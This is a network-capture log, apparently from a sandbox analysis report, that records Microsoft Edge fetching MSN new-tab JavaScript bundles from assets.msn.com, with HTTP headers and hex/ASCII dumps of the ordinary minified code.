2024-11-21 21:13:12 UTC	11402	IN	Data Raw: 30 30 30 30 32 43 37 45 0d 0a 67 74 68 3e 30 26 26 6e 2e 73 65 74 49 64 28 69 5b 30 5d 29 3b 74 72 79 7b 69 66 28 69 2e 6c 65 6e 67 74 68 3e 31 29 7b 76 61 72 20 72 3d 2b 69 5b 31 5d 3b 6e 2e 61 63 71 75 69 73 69 74 69 6f 6e 44 61 74 65 3d 2b 6e 65 77 20 44 61 74 65 28 72 29 2c 6e 2e 61 63 71 75 69 73 69 74 69 6f 6e 44 61 74 65 3d 6e 2e 61 63 71 75 69 73 69 74 69 6f 6e 44 61 74 65 3e 30 3f 6e 2e 61 63 71 75 69 73 69 74 69 6f 6e 44 61 74 65 3a 30 7d 69 66 28 69 2e 6c 65 6e 67 74 68 3e 32 29 7b 76 61 72 20 6f 3d 2b 69 5b 32 5d 3b 6e 2e 72 65 6e 65 77 61 6c 44 61 74 65 3d 2b 6e 65 77 20 44 61 74 65 28 6f 29 2c 6e 2e 72 65 6e 65 77 61 6c 44 61 74 65 3d 6e 2e 72 65 6e 65 77 61 6c 44 61 74 65 3e 30 3f 6e 2e 72 65 6e 65 77 61 6c 44 61 74 65 3a 30 7d 7d 63 61 74 Data Ascii: 00002C7Egth>0&&n.setId(i[0]);try{if(i.length>1){var r=+i[1];n.acquisitionDate=+new Date(r),n.acquisitionDate=n.acquisitionDate>0?n.acquisitionDate:0}if(i.length>2){var o=+i[2];n.renewalDate=+new Date(o),n.renewalDate=n.renewalDate>0?n.renewalDate:0}}cat
2024-11-21 21:13:12 UTC	16384	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 67 65 74 55 73 65 72 43 6f 6e 73 65 6e 74 44 65 74 61 69 6c 73 28 29 2c 6e 5b 34 5d 3d 69 2e 67 65 74 55 73 65 72 43 6f 6e 73 65 6e 74 28 29 2c 6e 29 2c 66 29 7d 2c 74 2e 61 70 70 6c 79 4f 73 43 6f 6e 74 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 2c 69 3d 74 2e 6f 73 3b 71 74 28 35 2c 65 2c 46 2c 28 28 6e 3d 7b 7d 29 5b 30 5d 3d 69 2e 6e 61 6d 65 2c 6e 5b 31 5d 3d 69 2e 76 65 72 2c 6e 29 2c 66 29 7d 2c 74 2e 61 70 70 6c 79 53 64 6b 43 6f 6e 74 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3b 71 74 28 36 2c 74 2c 42 2c 28 28 65 3d 7b 7d 29 5b 32 5d 3d 72 2e 69 6e 73 74 61 6c 6c 49 64 2c 65 5b 31 5d 3d 72 2e 67 65 74 53 65 71 75 65 6e 63 65 49 64 28 29 2c 65 5b 33 5d 3d 72 2e 65 70 6f 63 68 Data Ascii: 00006000getUserConsentDetails(),n[4]=i.getUserConsent(),n),f)},t.applyOsContext=function(e){var n,i=t.os;qt(5,e,F,((n={})[0]=i.name,n[1]=i.ver,n),f)},t.applySdkContext=function(t){var e;qt(6,t,B,((e={})[2]=r.installId,e[1]=r.getSequenceId(),e[3]=r.epoch

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	50013	23.44.203.17	443	4408	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 21:13:11 UTC	626	OUT	GET /bundles/v1/edgeChromium/latest/common.0af827ee54246cc151b3.js HTTP/1.1 Host: assets.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://ntp.msn.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-21 21:13:12 UTC	1239	IN	HTTP/1.1 200 OK Content-Type: application/javascript Content-MD5: vGnEXkOq1p5Z4uHMtI2xzQ== Last-Modified: Thu, 21 Nov 2024 01:19:38 GMT ETag: 0x8DD09CA9180AED4 Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: 5e9f4455-c01e-0036-58b3-3b360d000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Date: Thu, 21 Nov 2024 21:13:12 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Alt-Svc: h3=":443"; ma=86400 Akamai-Request-BC: [a=23.195.36.240,b=690613753,c=g,n=US_NJ_SECAUCUS,o=20940] Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0 Akamai-Cache-Status: Hit from child Akamai-Server-IP: 23.195.36.240 Akamai-Request-ID: 2929edf9 Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1} Cache-Control: public, no-transform, max-age=31535892 Timing-Allow-Origin: * Akamai-GRN: 0.f024c317.1732223592.2929edf9 Vary: Origin
2024-11-21 21:13:12 UTC	15145	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 28 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 3d 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 63 6f 6d 6d 6f 6e 22 5d 2c 7b 33 36 37 37 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 46 76 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 2c 67 51 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 63 6f 6e 73 74 20 69 3d 22 73 65 6c 65 63 74 65 64 4e 61 76 49 74 65 6d 43 6c 69 63 6b 65 64 22 3b 63 6c 61 73 73 20 72 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7b 74 68 69 73 2e 73 75 70 70 6f 72 74 Data Ascii: 00006000(self.edgeChromiumWebpackChunks=self.edgeChromiumWebpackChunks\|\|[]).push([["common"],{36777:function(e,t,n){"use strict";n.d(t,{Fv:function(){return r},gQ:function(){return i}});const i="selectedNavItemClicked";class r{constructor(){this.support
2024-11-21 21:13:12 UTC	9443	IN	Data Raw: 61 67 65 55 52 4c 28 65 29 7b 76 61 72 20 74 2c 6e 3b 69 66 28 6e 75 6c 6c 3d 3d 3d 28 74 3d 74 68 69 73 2e 63 6f 6e 66 69 67 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 21 74 2e 64 61 74 61 5b 65 5d 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 63 6f 6e 73 74 20 69 3d 6e 75 6c 6c 3d 3d 3d 28 6e 3d 74 68 69 73 2e 63 6f 6e 66 69 67 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 64 61 74 61 5b 65 5d 2e 69 6d 61 67 65 5b 60 69 24 7b 74 68 69 73 2e 63 75 72 72 65 6e 74 52 65 73 6f 6c 75 74 69 6f 6e 7d 60 5d 3b 72 65 74 75 72 6e 28 74 68 69 73 2e 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 57 43 2e 63 6f 6e 66 69 67 2e 65 6e 61 62 6c 65 53 74 61 74 69 63 49 6d 61 67 65 73 3f 28 30 2c 44 2e 62 66 29 28 60 69 6d 61 67 65 24 7b 65 7d 60 29 3a 44 Data Ascii: ageURL(e){var t,n;if(null===(t=this.config)\|\|void 0===t\|\|!t.data[e])return null;const i=null===(n=this.config)\|\|void 0===n?void 0:n.data[e].image[`i${this.currentResolution}`];return(this.backgroundImageWC.config.enableStaticImages?(0,D.bf)(`image${e}`):D
2024-11-21 21:13:12 UTC	16384	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 67 64 22 2c 7b 64 65 74 61 69 6c 3a 7b 69 73 4c 6f 77 45 6e 64 44 65 76 69 63 65 3a 21 31 7d 7d 29 29 2c 74 68 69 73 2e 69 73 46 52 45 26 26 74 68 69 73 2e 63 6f 6e 66 69 67 2e 64 69 73 61 62 6c 65 47 61 6c 6c 65 72 79 46 52 45 41 6e 64 4c 6f 77 45 6e 64 29 7b 74 68 69 73 2e 63 75 72 72 65 6e 74 50 72 6f 76 69 64 65 72 3d 22 46 52 45 42 61 63 6b 67 72 6f 75 6e 64 22 3b 62 72 65 61 6b 7d 69 66 28 74 68 69 73 2e 62 61 63 6b 67 72 6f 75 6e 64 47 61 6c 6c 65 72 79 45 6c 69 67 69 62 69 6c 69 74 79 26 26 74 68 69 73 2e 67 61 6c 6c 65 72 79 42 61 63 6b 67 72 6f 75 6e 64 53 65 6c 65 63 74 69 6f 6e 4d 65 74 61 64 61 74 61 29 7b 69 66 28 22 43 4d 53 49 6d 61 67 65 22 3d 3d 3d 74 68 69 73 2e 67 61 6c 6c 65 72 79 42 61 63 6b 67 72 6f 75 Data Ascii: 00006000gd",{detail:{isLowEndDevice:!1}})),this.isFRE&&this.config.disableGalleryFREAndLowEnd){this.currentProvider="FREBackground";break}if(this.backgroundGalleryEligibility&&this.galleryBackgroundSelectionMetadata){if("CMSImage"===this.galleryBackgrou
2024-11-21 21:13:12 UTC	8204	IN	Data Raw: 41 64 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 74 69 74 6c 65 2c 69 64 3a 6e 75 6c 6c 3d 3d 3d 28 74 3d 74 68 69 73 2e 6d 61 72 71 75 65 65 41 64 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 63 6c 69 63 6b 54 68 72 6f 75 67 68 55 72 6c 7d 7d 29 2e 67 65 74 4d 65 74 61 64 61 74 61 54 61 67 28 29 2c 74 68 69 73 2e 74 65 6c 65 6d 65 74 72 79 54 61 67 73 2e 6d 61 72 71 75 65 65 41 64 43 54 41 42 75 74 74 6f 6e 3d 74 68 69 73 2e 74 65 6c 65 6d 65 74 72 79 4f 62 6a 65 63 74 2e 61 64 64 4f 72 55 70 64 61 74 65 43 68 69 6c 64 28 7b 6e 61 6d 65 3a 22 4d 61 72 71 75 65 65 41 64 43 54 41 42 75 74 74 6f 6e 22 2c 74 79 70 65 3a 54 2e 63 39 2e 49 6e 74 65 72 61 63 74 69 6f 6e 2c 62 65 68 61 76 69 6f 72 3a 54 2e 77 75 Data Ascii: Ad)\|\|void 0===e?void 0:e.title,id:null===(t=this.marqueeAd)\|\|void 0===t?void 0:t.clickThroughUrl}}).getMetadataTag(),this.telemetryTags.marqueeAdCTAButton=this.telemetryObject.addOrUpdateChild({name:"MarqueeAdCTAButton",type:T.c9.Interaction,behavior:T.wu
2024-11-21 21:13:12 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 3f 76 6f 69 64 20 30 3a 65 2e 70 72 6f 70 65 72 74 69 65 73 3b 69 66 28 28 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 6c 65 6e 67 74 68 29 3e 30 26 26 6e 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 65 29 7b 63 6f 6e 73 74 20 74 3d 22 45 72 72 6f 72 20 69 6e 20 67 65 74 74 69 6e 67 20 77 70 6f 20 65 76 65 6e 74 20 67 6c 65 61 6d 20 64 61 74 61 22 3b 28 30 2c 6f 2e 48 29 28 72 2e 4f 64 35 2c 74 2c 60 65 72 72 6f 72 3a 24 7b 65 7d 60 29 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 28 29 29 2c 74 68 69 73 2e 63 68 72 6f 6d 69 75 6d 50 61 67 65 53 65 74 74 69 6e 67 73 43 6f 6e 6e 65 63 74 6f 72 3d 28 30 2c 57 2e 4b 30 29 28 6c 2e 52 4c 29 2c 74 68 69 73 2e 69 73 44 61 72 6b 4d 6f 64 65 3d 28 30 2c 59 2e 59 29 28 29 2c 74 68 Data Ascii: 00004000?void 0:e.properties;if((null==t?void 0:t.length)>0&&n)return n}catch(e){const t="Error in getting wpo event gleam data";(0,o.H)(r.Od5,t,`error:${e}`)}return null}()),this.chromiumPageSettingsConnector=(0,W.K0)(l.RL),this.isDarkMode=(0,Y.Y)(),th
2024-11-21 21:13:12 UTC	12	IN	Data Raw: 63 6b 5f 4d 61 72 71 75 65 65 0d 0a Data Ascii: ck_Marquee
2024-11-21 21:13:12 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 41 64 28 74 68 69 73 2e 72 65 66 5f 6d 61 72 71 75 65 65 41 64 53 70 6f 6e 73 6f 72 4c 6f 67 6f 29 7d 61 73 79 6e 63 20 6f 6e 43 6c 69 63 6b 5f 4d 61 72 71 75 65 65 41 64 28 65 29 7b 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 74 68 69 73 2e 6d 61 72 71 75 65 65 41 64 2e 63 6c 69 63 6b 54 68 72 6f 75 67 68 55 72 6c 2c 22 5f 62 6c 61 6e 6b 22 29 2e 66 6f 63 75 73 28 29 2c 61 77 61 69 74 20 73 65 2e 6f 2e 73 65 6e 64 42 65 61 63 6f 6e 73 28 74 68 69 73 2e 6d 61 72 71 75 65 65 41 64 2e 61 64 43 6c 69 63 6b 65 64 55 72 6c 73 29 2c 6b 2e 4d 30 2e 73 65 6e 64 41 63 74 69 6f 6e 45 76 65 6e 74 28 65 2c 54 2e 41 77 2e 43 6c 69 63 6b 2c 54 2e 77 75 2e 4e 61 76 69 67 61 74 65 29 7d 67 65 74 53 74 79 6c 65 46 6f 72 45 6c 65 6d 65 6e 74 4b 65 79 Data Ascii: 00004000Ad(this.ref_marqueeAdSponsorLogo)}async onClick_MarqueeAd(e){window.open(this.marqueeAd.clickThroughUrl,"_blank").focus(),await se.o.sendBeacons(this.marqueeAd.adClickedUrls),k.M0.sendActionEvent(e,T.Aw.Click,T.wu.Navigate)}getStyleForElementKey
2024-11-21 21:13:12 UTC	12	IN	Data Raw: 6c 6f 72 3a 72 67 62 61 28 30 0d 0a Data Ascii: lor:rgba(0
2024-11-21 21:13:12 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 2c 30 2c 30 2c 30 2e 36 34 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 36 70 78 3b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 3b 68 65 69 67 68 74 3a 33 32 70 78 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 38 70 78 3b 77 69 64 74 68 3a 33 32 70 78 7d 2e 68 6f 74 53 70 6f 74 53 75 62 54 65 78 74 41 72 65 61 7b 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 30 2e 37 34 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 68 6f 74 53 70 6f 74 53 75 62 54 65 78 74 41 72 65 61 3a 68 6f 76 65 72 7b 6f 70 61 63 69 74 79 3a 31 7d 2e 68 6f 74 53 70 6f 74 54 65 78 74 41 72 65 61 7b 62 6f 72 64 65 72 2d 72 61 64 69 Data Ascii: 00004000,0,0,0.64);border-radius:16px;cursor:default;height:32px;margin-inline-end:8px;width:32px}.hotSpotSubTextArea{color:rgba(255,255,255,0.74);font-size:12px;line-height:16px;opacity:0}.hotSpotSubTextArea:hover{opacity:1}.hotSpotTextArea{border-radi
2024-11-21 21:13:12 UTC	12	IN	Data Raw: 79 6c 65 3d 74 68 69 73 2e 63 0d 0a Data Ascii: yle=this.c

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	50015	23.44.203.17	443	4408	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 21:13:11 UTC	630	OUT	GET /bundles/v1/edgeChromium/latest/experience.b23f2c737ccf14018cf8.js HTTP/1.1 Host: assets.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://ntp.msn.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-21 21:13:12 UTC	1239	IN	HTTP/1.1 200 OK Content-Type: application/javascript Content-MD5: 0k/Kzb2pATSOyG1Ifkp6Gg== Last-Modified: Thu, 21 Nov 2024 01:19:38 GMT ETag: 0x8DD09CA91B2356E Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: a6af521c-b01e-00b6-45b3-3b8019000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Date: Thu, 21 Nov 2024 21:13:12 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Alt-Svc: h3=":443"; ma=86400 Akamai-Request-BC: [a=23.195.36.239,b=707689373,c=g,n=US_NJ_SECAUCUS,o=20940] Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0 Akamai-Cache-Status: Hit from child Akamai-Server-IP: 23.195.36.239 Akamai-Request-ID: 2a2e7b9d Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1} Cache-Control: public, no-transform, max-age=31535892 Timing-Allow-Origin: * Akamai-GRN: 0.ef24c317.1732223592.2a2e7b9d Vary: Origin
2024-11-21 21:13:12 UTC	15145	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 6f 2c 61 2c 69 2c 72 3d 7b 32 33 38 36 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 53 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 71 7d 7d 29 3b 76 61 72 20 6f 3d 6e 28 33 33 39 34 30 29 2c 61 3d 6e 28 36 35 31 37 35 29 2c 69 3d 6e 28 36 33 30 37 30 29 2c 72 3d 6e 28 33 39 30 30 31 29 2c 73 3d 6e 28 32 32 33 39 30 29 2c 64 3d 6e 28 34 34 38 38 36 29 2c 63 3d 6e 28 34 30 39 32 34 29 3b 76 61 72 20 6c 3d 6e 28 32 38 39 30 34 29 2c 70 3d 6e 28 39 39 34 35 32 29 2c 6d 3d 6e 28 34 32 35 39 30 29 2c 67 3d 6e 28 39 34 35 33 37 29 2c 75 3d 6e 28 38 35 32 30 35 29 2c 68 3d 6e 28 34 37 34 Data Ascii: 00006000!function(){var e,t,n,o,a,i,r={23865:function(e,t,n){"use strict";n.d(t,{S:function(){return q}});var o=n(33940),a=n(65175),i=n(63070),r=n(39001),s=n(22390),d=n(44886),c=n(40924);var l=n(28904),p=n(99452),m=n(42590),g=n(94537),u=n(85205),h=n(474
2024-11-21 21:13:12 UTC	9443	IN	Data Raw: 68 69 73 2e 66 69 72 73 74 4b 65 79 50 72 65 73 73 4c 6f 67 3d 21 31 2c 74 68 69 73 2e 62 69 6e 67 55 70 73 65 6c 6c 46 6f 63 75 73 65 64 3d 21 31 2c 74 68 69 73 2e 74 72 65 6e 64 69 6e 67 53 65 61 72 63 68 65 73 52 65 71 75 65 73 74 65 64 3d 21 31 2c 74 68 69 73 2e 6f 6e 41 75 74 6f 73 75 67 67 65 73 74 52 65 6e 64 65 72 65 64 3d 65 3d 3e 7b 63 6f 6e 73 74 20 74 3d 65 2e 74 61 72 67 65 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 53 75 67 67 4d 6f 64 65 22 29 3b 74 68 69 73 2e 69 73 4e 65 78 74 57 6f 72 64 41 53 4d 6f 64 65 3d 22 31 22 3d 3d 3d 74 7d 2c 74 68 69 73 2e 6f 6e 41 75 74 6f 73 75 67 67 65 73 74 53 68 6f 77 6e 3d 28 29 3d 3e 7b 74 68 69 73 2e 61 75 74 6f 73 75 67 67 65 73 74 53 68 6f 77 6e 3d 21 30 2c 28 30 2c 72 2e 47 67 29 28 72 2e 74 6b Data Ascii: his.firstKeyPressLog=!1,this.bingUpsellFocused=!1,this.trendingSearchesRequested=!1,this.onAutosuggestRendered=e=>{const t=e.target.getAttribute("SuggMode");this.isNextWordASMode="1"===t},this.onAutosuggestShown=()=>{this.autosuggestShown=!0,(0,r.Gg)(r.tk
2024-11-21 21:13:12 UTC	16384	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 75 64 69 65 6e 63 65 4d 6f 64 65 3b 21 30 3d 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 6e 61 62 6c 65 57 65 62 41 50 49 53 75 67 67 65 74 69 6f 6e 26 26 21 6e 26 26 21 74 68 69 73 2e 69 73 4d 6f 62 69 6c 65 28 29 26 26 21 74 68 69 73 2e 69 73 54 61 62 6c 65 74 28 29 26 26 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 6e 61 62 6c 65 4d 53 4e 53 75 67 67 65 73 74 69 6f 6e 73 26 26 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 6e 61 62 6c 65 4d 53 4e 53 75 67 67 65 73 74 69 6f 6e 73 3e 30 3f 31 3d 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 6e 61 62 6c 65 4d 53 4e 53 75 67 67 65 73 74 69 6f 6e 73 3f 74 68 69 73 2e 70 6c 61 63 65 68 6f 6c 64 65 72 3d 74 68 69 73 2e 70 6c 61 63 65 68 6f 6c 64 65 72 7c 7c 74 68 69 73 2e 6f 70 74 Data Ascii: 00006000udienceMode;!0===this.options.enableWebAPISuggetion&&!n&&!this.isMobile()&&!this.isTablet()&&this.options.enableMSNSuggestions&&this.options.enableMSNSuggestions>0?1===this.options.enableMSNSuggestions?this.placeholder=this.placeholder\|\|this.opt
2024-11-21 21:13:12 UTC	8204	IN	Data Raw: 73 76 67 60 2c 56 3d 60 24 7b 28 30 2c 73 2e 59 71 29 28 29 2e 53 74 61 74 69 63 73 55 72 6c 7d 2f 70 72 2d 34 39 39 39 31 34 31 2f 69 63 6f 6e 73 2f 73 65 61 72 63 68 2d 62 6f 78 2d 69 63 6f 6e 73 2f 73 65 61 72 63 68 5f 67 2e 73 76 67 60 2c 71 3d 60 24 7b 28 30 2c 73 2e 59 71 29 28 29 2e 53 74 61 74 69 63 73 55 72 6c 7d 2f 70 72 2d 35 31 35 36 31 39 33 2f 69 63 6f 6e 73 2f 73 65 61 72 63 68 2d 62 6f 78 2d 69 63 6f 6e 73 2f 73 65 61 72 63 68 5f 69 63 6f 6e 73 5f 6c 69 67 68 74 2e 70 6e 67 60 2c 4b 3d 60 24 7b 28 30 2c 73 2e 59 71 29 28 29 2e 53 74 61 74 69 63 73 55 72 6c 7d 2f 70 72 2d 35 31 35 36 31 39 33 2f 69 63 6f 6e 73 2f 73 65 61 72 63 68 2d 62 6f 78 2d 69 63 6f 6e 73 2f 73 65 61 72 63 68 5f 69 63 6f 6e 73 5f 64 61 72 6b 2e 70 6e 67 60 2c 4a 3d 44 Data Ascii: svg`,V=`${(0,s.Yq)().StaticsUrl}/pr-4999141/icons/search-box-icons/search_g.svg`,q=`${(0,s.Yq)().StaticsUrl}/pr-5156193/icons/search-box-icons/search_icons_light.png`,K=`${(0,s.Yq)().StaticsUrl}/pr-5156193/icons/search-box-icons/search_icons_dark.png`,J=D
2024-11-21 21:13:12 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 24 7b 24 2e 43 7d 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 70 78 3b 74 6f 70 3a 31 32 70 78 3b 62 6f 74 74 6f 6d 3a 31 32 70 78 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 35 36 70 78 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 31 36 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 62 6c 69 6e 6b 20 31 2e 33 73 20 73 74 65 70 2d 65 6e 64 20 69 6e 66 69 6e 69 74 65 7d 2e 73 65 61 72 63 68 2d 62 74 6e 2d 6f 6e 2d 72 69 67 68 74 2e 66 61 6b 65 2d 63 75 72 73 6f 72 7b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 31 36 70 78 7d 2e 73 65 61 72 63 68 2d 69 63 6f 6e 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 Data Ascii: 00004000${$.C};position:absolute;width:1px;top:12px;bottom:12px;margin-inline-start:56px;margin-inline-end:16px;animation:blink 1.3s step-end infinite}.search-btn-on-right.fake-cursor{margin-inline-start:16px}.search-icon{display:flex;justify-content:ce
2024-11-21 21:13:12 UTC	12	IN	Data Raw: 22 24 7b 65 3d 3e 65 2e 6f 6e 0d 0a Data Ascii: "${e=>e.on
2024-11-21 21:13:12 UTC	4135	IN	Data Raw: 30 30 30 30 31 30 31 42 0d 0a 53 75 62 6d 69 74 28 29 7d 22 20 64 61 74 61 2d 74 3d 22 24 7b 65 3d 3e 65 2e 62 75 74 74 6f 6e 54 65 6c 65 6d 65 74 72 79 54 61 67 7d 22 20 64 61 74 61 2d 63 75 73 74 6f 6d 68 61 6e 64 6c 65 64 3d 22 74 72 75 65 22 20 69 63 6f 6e 2d 6f 6e 6c 79 3e 24 7b 59 65 7d 3c 2f 66 6c 75 65 6e 74 2d 62 75 74 74 6f 6e 3e 60 2c 58 65 3d 79 65 2e 64 79 60 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 70 73 62 2d 77 72 70 20 24 7b 65 3d 3e 65 2e 61 75 74 6f 73 75 67 67 65 73 74 53 68 6f 77 6e 7c 7c 65 2e 73 68 6f 77 41 50 49 41 75 74 6f 53 75 67 67 65 73 74 42 6f 78 3f 22 61 75 74 6f 73 75 67 67 65 73 74 53 68 6f 77 6e 22 3a 22 22 7d 22 3e 3c 66 6c 75 65 6e 74 2d 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 64 65 65 70 2d 73 65 61 72 63 68 2d 62 74 Data Ascii: 0000101BSubmit()}" data-t="${e=>e.buttonTelemetryTag}" data-customhandled="true" icon-only>${Ye}</fluent-button>`,Xe=ye.dy`<div class="dpsb-wrp ${e=>e.autosuggestShown\|\|e.showAPIAutoSuggestBox?"autosuggestShown":""}"><fluent-button class="deep-search-bt
2024-11-21 21:13:12 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 61 74 65 73 46 6f 63 75 73 3a 21 30 7d 7d 29 7d 2c 34 37 35 30 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 71 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 7d 7d 29 3b 76 61 72 20 6f 3d 6e 28 33 33 39 34 30 29 2c 61 3d 6e 28 32 38 39 30 34 29 2c 69 3d 6e 28 34 32 35 39 30 29 2c 72 3d 6e 28 36 37 34 32 32 29 3b 63 6c 61 73 73 20 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 74 68 69 73 2e 72 65 73 70 6f 6e 73 65 3d 65 7d 67 65 74 20 57 65 62 55 72 6c 28 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 65 3d 74 68 69 73 2e 72 65 73 70 6f 6e 73 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 77 65 Data Ascii: 00004000atesFocus:!0}})},47507:function(e,t,n){"use strict";n.d(t,{q:function(){return T}});var o=n(33940),a=n(28904),i=n(42590),r=n(67422);class s{constructor(e){this.response=e}get WebUrl(){var e;return null===(e=this.response)\|\|void 0===e?void 0:e.we
